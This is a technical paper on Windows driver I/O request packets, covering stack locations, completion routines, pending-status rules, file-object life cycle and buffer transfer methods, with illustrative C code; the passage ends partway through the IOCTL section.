The Microsoft Windows family of operating systems communicates with drivers by sending input/output (I/O) request packets (IRPs). The data structure that encapsulates the IRP not only describes an I/O request, but also maintains information about the status of the request as it passes through the drivers that handle it. Because the data structure serves two purposes, an IRP can be defined as:

  • a container for an I/O request,

    – or –

  • a thread-independent call stack.

Considering IRPs from these two perspectives may help driver writers understand what their drivers must do to respond correctly to I/O requests.

For current documentation on routines and issues discussed in this paper, see the most recent version of the Microsoft Windows Driver Development Kit (DDK).

Definition 1: IRP as a Container for an I/O Request

The operating system presents most I/O requests to drivers using IRPs. IRPs are appropriate for this purpose because:

  • IRPs can be processed asynchronously.
  • IRPs can be cancelled.
  • IRPs are designed for I/O that involves more than one driver.

The IRP data structure packages the information that a driver requires to respond to an I/O request. The request might be from user mode or from kernel mode; regardless of the request’s origin, a driver requires the same information.

Every IRP has two parts, shown in Figure 1:

  • A header that describes the primary I/O request.
  • An array of parameters that describe subordinate requests (sometimes called sub-requests).

Figure 1. Structure of an IRP

The size of the header is fixed and is the same for every IRP. The size of the array of parameters depends on the number of drivers that will handle the request.
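
The size rule can be sketched in plain C. This is a simplified user-mode model, not the real IRP layout: ModelIrp, ModelStackLocation, and both functions are hypothetical names, and the fields are placeholders. The DDK expresses the same arithmetic with the IoSizeOfIrp macro.

```c
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical, heavily simplified stand-ins for the real structures. */
typedef struct ModelStackLocation {
    unsigned char major_function;   /* what this driver is asked to do */
    unsigned char minor_function;
    void *device_object;            /* device object of the owning driver */
} ModelStackLocation;

typedef struct ModelIrp {
    int status;                     /* header: state of the request */
    void *buffer;                   /* header: shared I/O buffer */
    unsigned char stack_count;      /* header: number of locations below */
    ModelStackLocation stack[];     /* one sub-request per driver */
} ModelIrp;

/* Fixed header plus one stack location per driver in the device stack. */
size_t model_irp_size(unsigned char stack_count)
{
    return sizeof(ModelIrp) + (size_t)stack_count * sizeof(ModelStackLocation);
}

/* Allocate a zeroed model IRP with room for stack_count sub-requests. */
ModelIrp *model_irp_alloc(unsigned char stack_count)
{
    ModelIrp *irp = calloc(1, model_irp_size(stack_count));
    if (irp != NULL) {
        irp->stack_count = stack_count;
    }
    return irp;
}
```

Each extra driver in the stack adds exactly one ModelStackLocation to the allocation, while the header portion stays the same.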

Contents of the IRP Header

An IRP is usually handled by a stack of drivers. The header of each IRP contains data that is used by each driver handling the IRP. While a given driver is handling an IRP, that driver is considered to be the current owner of the IRP.

The header of each IRP contains pointers to the following:

  • Buffers to read the input and write the output of the IRP.
  • A memory area for the driver that currently owns the IRP.
  • A routine, supplied by the driver that currently owns the IRP, which the operating system calls if the IRP is cancelled.
  • The parameters for the current sub-request.

In addition to the pointers, the IRP header contains other data that describes the nature and state of the request.

IRP Parameters

Following the IRP header is an array of sub-requests. An IRP can have more than one sub-request because IRPs are usually handled by a stack of drivers. Each IRP is allocated with a fixed number of such sub-requests, usually one for each driver in the device stack. This number typically matches the StackSize field of the top device object in the stack, though a driver in the middle of a stack could allocate fewer. If a driver must forward a request to a different device stack, it must allocate a new IRP.

Each sub-request is represented as an I/O stack location (a structure of type IO_STACK_LOCATION), and the IRP typically contains one such I/O stack location for each driver in the device stack to which the IRP is sent. A field in the IRP header identifies the I/O stack location that is currently in use. The value of this field is called the IRP stack pointer or the current stack location.

The IO_STACK_LOCATION structure includes the following:

  • The major and minor function codes for the IRP.
  • Arguments specific to these codes.
  • A pointer to the device object for the corresponding driver.
  • A pointer to an IoCompletion routine if the driver has set one.
  • A pointer to the file object associated with the request.
  • Various flags and context areas.

The IO_STACK_LOCATION does not contain the pointers to the input and output locations; these pointers are in the IRP itself. All the sub-requests operate on the same buffers.
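
The layout described above can be pictured with a small user-mode model. This is only a sketch: ToyIrp, ToyStackLocation, toy_irp_alloc, and toy_irp_size are hypothetical names, and the fields are a drastic simplification of the real IRP and IO_STACK_LOCATION definitions in the WDK headers. It shows only that the header has a fixed size, that the array grows with the depth of the device stack, and that the buffer pointer lives in the header rather than in each stack location.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical, simplified stand-in for IO_STACK_LOCATION. */
typedef struct ToyStackLocation {
    unsigned char major_function;   /* e.g. read, write, device control   */
    unsigned char minor_function;
    void *device_object;            /* device object of the owning driver */
    void *completion_routine;       /* NULL if the driver set none        */
} ToyStackLocation;

/* Hypothetical, simplified stand-in for the IRP: fixed header + array. */
typedef struct ToyIrp {
    void *system_buffer;            /* shared by all sub-requests          */
    int status;
    size_t stack_count;             /* number of stack locations allocated */
    size_t current_location;        /* index of the location in use        */
    ToyStackLocation stack[];       /* one entry per driver in the stack   */
} ToyIrp;

/* Total allocation size: fixed header plus one entry per driver. */
size_t toy_irp_size(size_t stack_size)
{
    return sizeof(ToyIrp) + stack_size * sizeof(ToyStackLocation);
}

/* Allocate a zeroed toy IRP for a device stack stack_size drivers deep. */
ToyIrp *toy_irp_alloc(size_t stack_size)
{
    assert(stack_size > 0);
    ToyIrp *irp = calloc(1, toy_irp_size(stack_size));
    if (irp != NULL) {
        irp->stack_count = stack_size;
    }
    return irp;
}
```

In this model, adding a driver to the stack increases the allocation by exactly one ToyStackLocation, while the header portion stays the same.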

Definition 2: IRP as a Thread-Independent Call Stack

Performing an I/O operation typically requires more than one driver for a device. Each driver for a device creates a device object, and these device objects are organized hierarchically into a device stack. IRPs are passed down the device stack from one driver to the next. For each driver in the stack, the IRP contains a pointer to an I/O stack location. Because the drivers can handle the requests asynchronously, an IRP is similar to a thread-independent call stack, as Figure 2 shows.

Figure 2. IRP as thread-independent call stack

On the left side of Figure 2, the thread stack shows how the parameters and return address for drivers A, B, and C might be organized into a call stack. On the right, the figure shows how these parameters and return addresses correspond to the I/O stack locations and IoCompletion routines in an IRP.

The asynchronous nature of IRP handling is critical to the operating system and the Windows Driver Model (WDM). In a synchronous, single-threaded I/O design, the application that issues a request, and each driver through which the request passes, must wait until all lower components have completed the request. Such a design uses system resources inefficiently, thus decreasing system performance.

The structure of the IRP provides for an inherently asynchronous design, enabling applications to queue one or more I/O requests without waiting. While the I/O request is in progress, the application thread is free to perform calculations or queue additional I/O requests. Because all the information required to process the request is encapsulated in the IRP, the requesting thread’s call stack can be decoupled from the I/O request.

Passing an IRP to the Next Lower Driver

Passing an IRP to the next lower driver (also called forwarding an IRP) is the IRP equivalent of a subroutine call. When a driver forwards an IRP, it must populate the next I/O stack location with parameters, advance the IRP stack pointer, and invoke the next driver’s dispatch routine. In essence, the driver is calling down the IRP stack.

To pass an IRP, a driver typically takes the following steps:

  1. Set up the parameters for the next I/O stack location. The driver can either:
    • Call the IoGetNextIrpStackLocation routine to get a pointer to the next I/O stack location, and then copy the required parameters to that location.
    • Call the IoCopyCurrentIrpStackLocationToNext routine (if the driver sets an IoCompletion routine in step 2), or the IoSkipCurrentIrpStackLocation routine (if the driver does not set an IoCompletion routine in step 2) to pass the same parameters used for the current location.

    Note   Drivers must not use the RtlCopyMemory routine to copy the current parameters. This routine copies the pointer to the current driver’s IoCompletion routine, thus causing the IoCompletion routine to be called more than once.

  2. Set an IoCompletion routine for post-processing, if necessary, by calling the IoSetCompletionRoutine routine. If the driver sets an IoCompletion routine, it must call IoCopyCurrentIrpStackLocationToNext in step 1.
  3. Pass the request to the next driver by calling the IoCallDriver routine. This routine automatically advances the IRP stack pointer and invokes the next driver’s dispatch routine.
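
The reason for the note about RtlCopyMemory can be shown with a toy model of step 1. The types and functions below (FwdStackLocation, fwd_copy_current_to_next, fwd_dummy_routine) are hypothetical and run in user mode. They only illustrate the idea that the parameters are copied to the next location while the completion routine and its context are deliberately left out, which is the behavior the text attributes to IoCopyCurrentIrpStackLocationToNext.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, simplified stack location. */
typedef struct FwdStackLocation {
    int major_function;
    int parameter;                      /* stands in for the argument union */
    void (*completion_routine)(void);   /* set by the driver above          */
    void *context;
} FwdStackLocation;

/* Placeholder routine used only to populate the current location. */
void fwd_dummy_routine(void)
{
}

/* Copy the request parameters to the next location, but NOT the
 * completion routine or its context. A raw memory copy of the whole
 * structure would duplicate the routine pointer, so the same routine
 * would run once for each location that carries it. */
void fwd_copy_current_to_next(const FwdStackLocation *current,
                              FwdStackLocation *next)
{
    assert(current != NULL && next != NULL);
    next->major_function = current->major_function;
    next->parameter = current->parameter;
    next->completion_routine = NULL;
    next->context = NULL;
}
```

After the copy, the forwarding driver is free to install its own completion routine in the next location, which corresponds to step 2.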

Completing an IRP

When I/O is complete, the driver that completed the I/O calls the IoCompleteRequest routine. This routine moves the IRP stack pointer to point to the next higher location in the IRP stack, as Figure 3 shows.

Figure 3. IRP completion and stack pointer

Figure 3 shows the current I/O stack location after driver C has called IoCompleteRequest. The solid arrow on the left indicates that the stack pointer now points to the parameters and callback for driver B. The dotted arrow indicates the previous stack location. The hollow arrow on the right indicates the order in which the IoCompletion routines are called.

Note   For ease of explanation, this paper shows the I/O stack locations in the IRP "upside-down," that is, in inverted order from A to C instead of from C to A. Using an inverted diagram enables calls that proceed "down" the device stack to point downwards.

If a driver set an IoCompletion routine as it passed the IRP down the device stack, the I/O Manager calls that routine when the IRP stack pointer once again points to the I/O stack location for the driver. In this way, IoCompletion routines act as return addresses for the drivers that handled the IRP as it traversed the device stack.

An IoCompletion routine can return either of two status values:

  • STATUS_CONTINUE_COMPLETION—continues the upward completion of the IRP. The I/O Manager advances the IRP stack pointer and calls the next-higher driver’s IoCompletion routine.
  • STATUS_MORE_PROCESSING_REQUIRED—stops the upward completion of the IRP and leaves the IRP stack pointer at its current location. Drivers that return this status usually restart the upward completion of the IRP later by calling the IoCompleteRequest routine.

When every driver has completed its corresponding sub-request, the I/O request is complete. The I/O Manager retrieves the status of the request from the Irp->IoStatus.Status field, and retrieves the number of bytes transferred from the Irp->IoStatus.Information field.
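
The upward walk through the completion routines can be simulated in a few lines of user-mode C. This is a sketch under simplifying assumptions: CompIrp, comp_complete_request, comp_record, and comp_hold are hypothetical names, and each routine is stored in the slot of the driver that set it, whereas the real I/O Manager stores it one stack location lower. The model shows routines running from the lowest driver upward, and a routine that returns the "more processing required" value halting the walk until completion is restarted.

```c
#include <assert.h>
#include <stddef.h>

#define COMP_CONTINUE_COMPLETION       0
#define COMP_MORE_PROCESSING_REQUIRED  1
#define COMP_MAX_DRIVERS               8

typedef int (*CompRoutine)(int driver_index, void *context);

typedef struct CompIrp {
    CompRoutine completion[COMP_MAX_DRIVERS]; /* one slot per driver */
    void *context[COMP_MAX_DRIVERS];
    int current;          /* index of the driver that owns the IRP */
} CompIrp;

/* Continue upward completion from the driver that currently owns the
 * IRP. Returns the index of the driver at which completion stopped,
 * or -1 if the request completed all the way back to the initiator. */
int comp_complete_request(CompIrp *irp)
{
    assert(irp != NULL && irp->current < COMP_MAX_DRIVERS);
    while (irp->current > 0) {
        irp->current--;                     /* next-higher driver */
        CompRoutine routine = irp->completion[irp->current];
        if (routine != NULL &&
            routine(irp->current, irp->context[irp->current])
                == COMP_MORE_PROCESSING_REQUIRED) {
            return irp->current;            /* this driver keeps the IRP */
        }
    }
    return -1;
}

/* Example routine: append the driver index to a trace array, where
 * trace[0] holds the number of entries recorded so far. */
int comp_record(int driver_index, void *context)
{
    int *trace = context;
    trace[++trace[0]] = driver_index;
    return COMP_CONTINUE_COMPLETION;
}

/* Example routine: record the call, then halt upward completion. */
int comp_hold(int driver_index, void *context)
{
    comp_record(driver_index, context);
    return COMP_MORE_PROCESSING_REQUIRED;
}
```

If driver 1 installs comp_hold, the first call to comp_complete_request stops at driver 1. A second call resumes from there and reaches driver 0, which mirrors a driver restarting completion by calling IoCompleteRequest.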

Synchronous I/O Responses

Although the Windows operating system is designed for asynchronous I/O, most applications issue synchronous I/O requests.

One way to implement a synchronous I/O design is shown in the following code fragment.

// Register something that will set an event.
// (Not shown)

// Send the IRP down the device stack
IoCallDriver(nextDevice, Irp);

// Wait on an event to be signaled
KeWaitForSingleObject( &event, ... );

// Get the final status
status = Irp->IoStatus.Status;

This design has a serious problem, however: the KeWaitForSingleObject routine uses the system-wide dispatcher lock. This lock protects the signal state of events, semaphores, and mutexes, and consequently is used frequently throughout the operating system. Requiring the use of this lock for every synchronous I/O operation would unacceptably hinder performance.

To avoid this problem, the IoCallDriver routine was designed to return a status value. If an I/O request is completed synchronously, IoCallDriver returns the completion status returned by the next lower driver. If a request is being processed asynchronously, IoCallDriver returns STATUS_PENDING.

If a request can be completed synchronously, a driver completes the IRP with a status value and returns the same status value from its dispatch routine. Drivers above it in the device stack can get the status in either of two ways:

  • In the dispatch routine, from the value returned by IoCallDriver.
  • In the IoCompletion routine, from the IoStatus.Status field of the IRP.

Figure 4 shows the two ways a driver or application can get the status of an IRP. For ease of explanation, the figure shows the IoCompletion routines in the same I/O stack location as the parameters with which they are called, instead of one location lower.

Figure 4. Status returned by IoCallDriver and available to IoCompletion routine

  • On the left side of Figure 4, the IoCallDriver routine returns the completion status reported by the next lower driver. On the right, the IoCompletion routines read the status from the IoStatus.Status field of the IRP. If the IRP completes synchronously, the IoCompletion routine for each driver is called before IoCallDriver returns, so the status value is available to the IoCompletion routine before it is available to the dispatch routine.
  • Figure 4 shows that driver C returns STATUS_SUCCESS, driver B returns STATUS_RETRY, and driver A returns STATUS_ERROR. The final status of the IRP is available only to the initiator of the request; other drivers can read only the status returned by the next-lower driver.

Because a driver returns STATUS_PENDING to indicate that an IRP will be completed asynchronously, drivers can determine which responses are synchronous and which are asynchronous. Therefore, an application’s request for synchronous I/O can be coded as follows.

// Register something that will set an event.
// (Not shown)

// Send the IRP down the device stack
status = IoCallDriver(nextDevice, Irp);

if (status == STATUS_PENDING){
    // Wait on an event to be signaled
    KeWaitForSingleObject( &event, ... );

    // Get the final status
    status = Irp->IoStatus.Status;
}

In this design, the KeWaitForSingleObject routine is called only if the request returns STATUS_PENDING. Therefore, the dispatcher lock is used only if the response is essentially asynchronous.

Asynchronous I/O Responses

A driver should return STATUS_PENDING from a dispatch routine when it cannot complete an I/O request synchronously in a timely manner. Understanding when to return STATUS_PENDING is a problem for many driver writers.

A driver must return STATUS_PENDING if:

  • Its dispatch routine for an IRP might return before the IRP is completed.
  • It completes the IRP on another thread.
  • The dispatch routine cannot determine the IRP’s completion status before it returns.

The driver must call the IoMarkIrpPending macro before it releases control of the IRP and before it returns STATUS_PENDING. IoMarkIrpPending sets the SL_PENDING_RETURNED bit in the Control field of the current I/O stack location. Each time an I/O stack location is completed, the I/O Manager copies the value of this bit to the Irp->PendingReturned field in the IRP header, as Figure 5 shows.

Figure 5. Propagating the pending bit

In Figure 5, Driver C’s call to the IoMarkIrpPending macro sets the SL_PENDING_RETURNED bit in the Control field of Driver C’s I/O stack location. When Driver C completes the IRP, the I/O Manager changes the IRP stack pointer to point to driver B, and propagates the value of the SL_PENDING_RETURNED bit to the PendingReturned field in the IRP header.

IoCompletion Routines and Asynchronous I/O Responses

If a driver sets an IoCompletion routine for an IRP, the IoCompletion routine can check the value of the Irp->PendingReturned field to determine whether the IRP will be completed asynchronously.

If the value of the Irp->PendingReturned field is TRUE, the IoCallDriver routine will return (or has already returned) STATUS_PENDING. If Irp->PendingReturned is FALSE, IoCallDriver has already returned with the value in the Irp->IoStatus.Status field. IoCompletion routines for intermediate drivers can similarly test Irp->PendingReturned to determine how the result of their forwarded request is being handled.

Drivers that complete I/O requests asynchronously sometimes must perform additional processing as the IRP moves back up the device stack. The following code sets an IoCompletion routine when it forwards an IRP to the next lower driver, then waits on an event. Thus, it handles an asynchronous response in the same manner as a synchronous one.

KeInitializeEvent(&event, NotificationEvent, FALSE);

// Set a completion routine that will catch the IRP
IoSetCompletionRoutine(Irp, CatchIrpRoutine, &event, ...);

// Send the IRP down
status = IoCallDriver(nextDevice, Irp);

if (status == STATUS_PENDING) {

    // Wait on some event that will be signaled
    KeWaitForSingleObject( &event, ... );

    // Get the final status
    status = Irp->IoStatus.Status;
}

The following code shows the IoCompletion routine set in the preceding fragment.

NTSTATUS
CatchIrpRoutine(
    IN PDEVICE_OBJECT    DeviceObject,
    IN PIRP      Irp,
    IN PKEVENT   Event
    )
{
    if (Irp->PendingReturned) {

        // Release waiting thread
        KeSetEvent( Event, IO_NO_INCREMENT, FALSE );
    }

    return STATUS_MORE_PROCESSING_REQUIRED;
}

The IoCompletion routine tests the value of the Irp->PendingReturned field. Based on this value, it sets an event only if STATUS_PENDING has been or will be returned to the caller. When the request completes synchronously, this avoids an unnecessary call to the KeSetEvent routine, which uses the system-wide dispatcher lock.

The IoCompletion routine returns STATUS_MORE_PROCESSING_REQUIRED. This status indicates to the I/O Manager that the current driver must perform additional processing while it owns the IRP. The I/O Manager stops the upward completion of the IRP, leaving the I/O stack location in its current position. The current driver still owns the IRP and can continue to process it in another routine. When the driver has completely processed the IRP, it should call the IoCompleteRequest routine to continue IRP completion.

Propagating the Pending Bit

Any time a driver handling an I/O request returns the response of the next-lower driver, the value of the pending bit in its I/O stack location (SL_PENDING_RETURNED in the Control field of the IO_STACK_LOCATION structure) must be the same as that of the next-lower driver. If the driver does not set an IoCompletion routine, the I/O Manager automatically propagates the value of the bit, freeing the driver of this responsibility. If the driver sets an IoCompletion routine, however, and the next-lower driver returns STATUS_PENDING, the current driver must mark its own I/O stack location as pending. For example,

// Forward request to next driver
IoCopyCurrentIrpStackLocationToNext( Irp );

// Send the IRP down
status = IoCallDriver( nextDevice, Irp );

// Return the lower driver's status
return status;
 

Because this example does not set an IoCompletion routine, the driver must not call the IoMarkIrpPending macro. The driver simply returns the same status as the next-lower driver, and the I/O Manager copies the value of the pending bit.

If the driver sets an IoCompletion routine, however, this code is insufficient for situations in which the lower driver returns STATUS_PENDING. In such situations, the driver must call the IoMarkIrpPending macro to set the SL_PENDING_RETURNED bit for its own I/O stack location. The driver must call IoMarkIrpPending from an IoCompletion routine; it must not make this call from its dispatch routine. Thus, the following code is incorrect.

// Forward request to next driver
IoCopyCurrentIrpStackLocationToNext( Irp );

// Send the IRP down
status = IoCallDriver( nextDevice, Irp );

// The following is an error because this driver
// no longer owns the IRP.
if (status == STATUS_PENDING) {

    IoMarkIrpPending( Irp );
}

// Return the lower driver's status
return status;

This approach is incorrect because IoMarkIrpPending operates on the current I/O stack location. After IoCallDriver passes the IRP to the next lower driver, the current driver no longer owns the IRP. Thus, when the call to IoMarkIrpPending is executed, there is no current I/O stack location; in fact, if a lower driver completed the IRP, then the pointer is no longer valid. To avoid this problem, the driver must call IoMarkIrpPending from an IoCompletion routine. For example,

NTSTATUS
CompletionRoutine( ... )
{
   if (Irp->PendingReturned) {

      // Return the lower driver's result. If the
      // lower driver marked its stack location pending,
      // so do we.
      IoMarkIrpPending( Irp );
   }

... //additional processing in IoCompletion routine

   return STATUS_CONTINUE_COMPLETION;
}

Drivers should use this code sequence only when returning the same status as the lower driver. If the driver does not set an IoCompletion routine, the I/O Manager automatically propagates the value of the SL_PENDING_RETURNED bit upwards to the next I/O stack location. A driver is not required to use an IoCompletion routine simply to call IoMarkIrpPending, but if a driver does have an IoCompletion routine, and a lower driver returns STATUS_PENDING, the IoCompletion routine must call IoMarkIrpPending.
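
The effect of this rule can be seen in a small user-mode simulation. Everything here is hypothetical (PendIrp, pend_mark_irp_pending, pend_complete, and the two example routines), and the model stores each routine in the slot of the driver that set it, which is simpler than the real stack layout. It sketches the behavior described above: at each level, either the I/O Manager propagates the bit (no routine set) or the driver's own routine must do so.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define PEND_MAX_DRIVERS 8

typedef struct PendIrp PendIrp;
typedef void (*PendRoutine)(PendIrp *irp);

struct PendIrp {
    bool pending_returned;               /* models Irp->PendingReturned */
    bool sl_pending[PEND_MAX_DRIVERS];   /* models SL_PENDING_RETURNED  */
    PendRoutine completion[PEND_MAX_DRIVERS];
    int current;                         /* index of current location   */
};

/* Models IoMarkIrpPending: set the bit in the current stack location. */
void pend_mark_irp_pending(PendIrp *irp)
{
    assert(irp->current >= 0 && irp->current < PEND_MAX_DRIVERS);
    irp->sl_pending[irp->current] = true;
}

/* Complete the current location and every location above it. Returns
 * the pending indication that finally reaches the initiator. */
bool pend_complete(PendIrp *irp)
{
    for (;;) {
        /* Copy the completed location's bit into the header. */
        irp->pending_returned = irp->sl_pending[irp->current];
        if (irp->current == 0) {
            return irp->pending_returned;
        }
        irp->current--;                  /* next-higher driver */
        if (irp->completion[irp->current] != NULL) {
            /* The driver set a routine, so it must propagate the bit. */
            irp->completion[irp->current](irp);
        } else if (irp->pending_returned) {
            /* No routine: the bit is propagated automatically. */
            pend_mark_irp_pending(irp);
        }
    }
}

/* Correct routine: re-mark our location if the lower one was pending. */
void pend_good_routine(PendIrp *irp)
{
    if (irp->pending_returned) {
        pend_mark_irp_pending(irp);
    }
}

/* Buggy routine: forgets to propagate the pending bit. */
void pend_bad_routine(PendIrp *irp)
{
    (void)irp;
}
```

With pend_good_routine in the middle of the stack, the pending indication reaches the top. With pend_bad_routine it is lost, so in this model the initiator would wrongly conclude that the request completed synchronously.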

Summary of Guidelines for Pending IRPs

Driver writers must follow certain guidelines when handling IRPs for which STATUS_PENDING can be returned. Ignoring these guidelines may cause post-processing to occur twice, resulting in a system crash, or it may prevent post-processing from occurring, resulting in a system hang.

The following are the fundamental guidelines for returning STATUS_PENDING:

  • If a driver returns STATUS_PENDING, it must first call the IoMarkIrpPending macro to mark the I/O stack location as pending.
  • Conversely, if a driver calls IoMarkIrpPending, it must return STATUS_PENDING.

In addition:

  • If a driver returns the same status as the next lower driver and sets an IoCompletion routine, the IoCompletion routine must call IoMarkIrpPending if the value of the Irp->PendingReturned field is TRUE.
  • If a driver completes an I/O request on a different thread from that on which it received the request, its dispatch routine or IoCompletion routine must call IoMarkIrpPending, and its dispatch routine must return STATUS_PENDING.

Optimizations

By testing the value of the Irp->PendingReturned field, a driver can take advantage of the pending bit to optimize post-processing work for an I/O request. For example, a driver can use the processor cache efficiently, thus improving throughput, by post-processing the IRP after the IoCallDriver routine returns a synchronous response. The logic of such an optimization is as follows:

  • In a synchronous I/O response, the thread that initiated the I/O request can perform post-processing if IoCallDriver does not return STATUS_PENDING. In this case, the IRP is complete when IoCallDriver returns, so the dispatch routine can perform any required processing.
  • In an asynchronous I/O response, the IoCompletion routine should perform the post-processing if IoCallDriver returns STATUS_PENDING. The IoCompletion routine must test the value of Irp->PendingReturned, as described in IoCompletion Routines and Asynchronous I/O Responses earlier in this paper. If the value of Irp->PendingReturned is TRUE, the IoCompletion routine performs the required post-processing.

The operating system uses this exact technique for read requests, write requests, and some I/O control codes (IOCTLs). Consequently, if a driver fails to follow the guidelines in Summary of Guidelines for Pending IRPs earlier in this paper, the operating system will perform post-processing twice or not at all.

Life Cycle of a File Object

A file object is created each time a device is opened. Each file object represents a single use of an individual file, and maintains state information for that use (such as current file offset). When the I/O Manager creates and opens a file object, it creates a handle to refer to the object. The IRP_MJ_CREATE, IRP_MJ_CLEANUP, and IRP_MJ_CLOSE requests define the life cycle of a file object.

IRP_MJ_CREATE Requests

An IRP_MJ_CREATE request notifies the driver that a new file object has been created. The I/O Manager typically sends an IRP_MJ_CREATE request when a user-mode application calls the CreateFile function or a kernel-mode driver calls the ZwCreateFile routine.

In an IRP_MJ_CREATE request, the current I/O stack location contains a FileObject structure, which identifies the file object to open. The FileObject structure specifies:

  • The name of the file to open in the FileObject->FileName field.
  • Two pointers for driver use in the FileObject->FsContext and FileObject->FsContext2 fields.

Note   In a WDM device stack, only the functional device object (FDO) can use the two context pointers. File system drivers use special functions to share these fields among multiple drivers.

IRP_MJ_CREATE requests arrive in the context of the thread and the process that opened or created the file. A driver can record per-caller information, if required.

In response to a create request, the operating system checks access rights as follows:

  • If the request does not include a file name, the operating system checks the rights against the ACL for the device object opened by name.
  • If the request includes a file name, the operating system checks security only if the FILE_DEVICE_SECURE_OPEN characteristic is set in the DeviceObject->Characteristics field. Otherwise, the driver is responsible for checking security.

If the request succeeds, the operating system saves the granted rights in the handle to the object, for use in subsequent I/O requests. For detailed information on driver security, see the Microsoft Windows Driver Development Kit (DDK).

IRP_MJ_CLEANUP Requests

An IRP_MJ_CLEANUP request notifies a driver that the last handle to a file object has been closed. This request does not indicate that the file object has been deleted.

The I/O Manager sends an IRP_MJ_CLEANUP request for a file object after the last handle to the object is closed. When a driver receives an IRP_MJ_CLEANUP request, the driver must complete any pending IRPs for the specified file object. After the IRPs have been completed, the I/O Manager destroys the file object. While the IRPs are pending, the I/O Manager cannot delete the object.

IRP_MJ_CLEANUP requests arrive in the context of the caller that attempts to close the last handle. If the driver recorded any information about the caller when the IRP_MJ_CREATE request arrived, it should release that information when it processes the IRP_MJ_CLEANUP request. If the file handle has been duplicated, however, the context for the IRP_MJ_CLEANUP request might not be the same as that for the corresponding IRP_MJ_CREATE request. Consequently, driver writers must be careful to determine the appropriate context when using process information during cleanup operations.

For example, an application can call the DuplicateHandle() function to duplicate a file handle into another process. If the new handle is closed last, after all the handles in the original process, the driver will receive an IRP_MJ_CLEANUP request on a handle in the new process context. The context still represents the caller, but it is not the same as the original caller that created the file object.

IRP_MJ_CLOSE Requests

An IRP_MJ_CLOSE request notifies a driver that a file object has been deleted.

The I/O Manager sends an IRP_MJ_CLOSE request for a file object when both of the following are true:

  • All handles to the file object are closed.
  • No outstanding references to the object, such as those caused by a pending IRP, remain.

Unlike IRP_MJ_CREATE and IRP_MJ_CLEANUP requests, an IRP_MJ_CLOSE request does not arrive in the context of the caller.

In response to an IRP_MJ_CLOSE request, a driver should reverse whatever actions it performed in response to the corresponding IRP_MJ_CREATE request. Additional tasks depend on the design of the driver and the type of hardware it supports.
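
The ordering of the three requests can be sketched with two counters. This is a user-mode toy with hypothetical names (ToyFileObject, toy_create, toy_start_irp, toy_complete_irp, toy_close_handle), not the I/O Manager's actual bookkeeping. It assumes that each open handle and each pending IRP holds one reference on the file object, that cleanup corresponds to the handle count reaching zero, and that close corresponds to the reference count reaching zero.

```c
#include <assert.h>
#include <stdbool.h>

typedef struct ToyFileObject {
    int handle_count;      /* open handles to the file object           */
    int reference_count;   /* handles plus other refs, e.g. pending IRPs */
    bool cleanup_sent;     /* models IRP_MJ_CLEANUP having been sent     */
    bool close_sent;       /* models IRP_MJ_CLOSE having been sent       */
} ToyFileObject;

/* Drop one reference; the last reference triggers the close request. */
static void toy_dereference(ToyFileObject *f)
{
    assert(f->reference_count > 0);
    if (--f->reference_count == 0) {
        f->close_sent = true;
    }
}

/* Models a successful IRP_MJ_CREATE: one handle, one reference. */
void toy_create(ToyFileObject *f)
{
    f->handle_count = 1;
    f->reference_count = 1;
    f->cleanup_sent = false;
    f->close_sent = false;
}

/* A pending IRP holds a reference until it is completed. */
void toy_start_irp(ToyFileObject *f)    { f->reference_count++; }
void toy_complete_irp(ToyFileObject *f) { toy_dereference(f); }

/* Closing the last handle triggers cleanup; close may come later. */
void toy_close_handle(ToyFileObject *f)
{
    assert(f->handle_count > 0);
    if (--f->handle_count == 0) {
        f->cleanup_sent = true;
    }
    toy_dereference(f);
}
```

In this model, closing the only handle while an IRP is still pending sets cleanup_sent but not close_sent. The close indication appears only after the pending IRP is completed, which is why a driver must complete pending IRPs during cleanup.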

Data Transfer Mechanisms

The Windows family of operating systems supports three data transfer mechanisms:

  • Buffered I/O operates on a kernel-mode copy of the user’s data.
  • Direct I/O accesses the user’s data directly through Memory Descriptor Lists (MDLs) and kernel-mode pointers.
  • Method neither I/O (neither buffered nor direct I/O) accesses the user’s data through user-mode pointers.

For standard I/O requests, such as IRP_MJ_READ and IRP_MJ_WRITE, drivers specify which transfer mechanism they support by modifying the value of the DeviceObject->Flags field soon after creating the device.

Buffered I/O

To receive read and write requests as buffered I/O, the driver sets the DO_BUFFERED_IO flag in the DeviceObject->Flags field during initialization. When a driver receives a buffered I/O request, the Irp->AssociatedIrp.SystemBuffer field contains the address of the kernel-mode buffer on which the driver should operate. The I/O Manager copies data from the kernel-mode buffer to the user-mode buffer during a read request, or from the user-mode buffer to the kernel-mode buffer during a write request.

Direct I/O

To receive read and write requests as direct I/O, the driver sets the DO_DIRECT_IO flag in the DeviceObject->Flags field during initialization. When a driver receives a direct I/O request, the Irp->MdlAddress field contains the address of an MDL that describes the request buffer. The MDL lists the buffer’s virtual address and size, along with the physical pages in the buffer. The I/O Manager locks these physical pages before issuing the request to the driver, and unlocks them during completion. The driver must not use the user-mode buffer address specified in the MDL; instead, it must get a kernel-mode address by calling the MmGetSystemAddressForMdlSafe macro.

Neither Buffered nor Direct I/O

To receive neither buffered nor direct I/O requests, the driver sets neither the DO_BUFFERED_IO flag nor the DO_DIRECT_IO flag in the DeviceObject->Flags field. When a driver receives such a request, the Irp->UserBuffer field contains the address of the data pertaining to the request. Because this buffer is in the user address space, the driver must validate the address before using it. To validate the pointer, a driver calls the ProbeForRead or ProbeForWrite function within a try/except block. The driver must also perform all access to the buffer within a try/except block.

In addition, the driver must copy the data to a safe kernel-mode address, either in the pool or on the stack, before manipulating it. Copying the data to a kernel-mode buffer ensures that the user-mode caller cannot change the data after the driver has validated it.

Note   For detailed information on probing and on problems commonly seen in driver I/O paths, see Common Driver Reliability Issues.

I/O Control Codes (IOCTLs)

The I/O Manager sends an I/O control code (IOCTL) as part of the IRP for requests other than read or write requests. An IOCTL is a 32-bit control code that identifies an I/O or device operation. Requests that specify IOCTLs can have both input and output buffers.

The operating system supports two types of IOCTLs, which are sent in two different IRPs:

  • IRP_MJ_DEVICE_CONTROL requests can be sent from user mode or kernel mode. These requests are sometimes called public IOCTLs.
  • IRP_MJ_INTERNAL_DEVICE_CONTROL requests can be sent by kernel-mode components only. These requests are typically used for driver-to-driver communication and are sometimes called private IOCTLs.

For an IOCTL, the transfer mechanism is specified in the Method field of the control code. IOCTLs support the following transfer mechanisms:

  • METHOD_BUFFERED
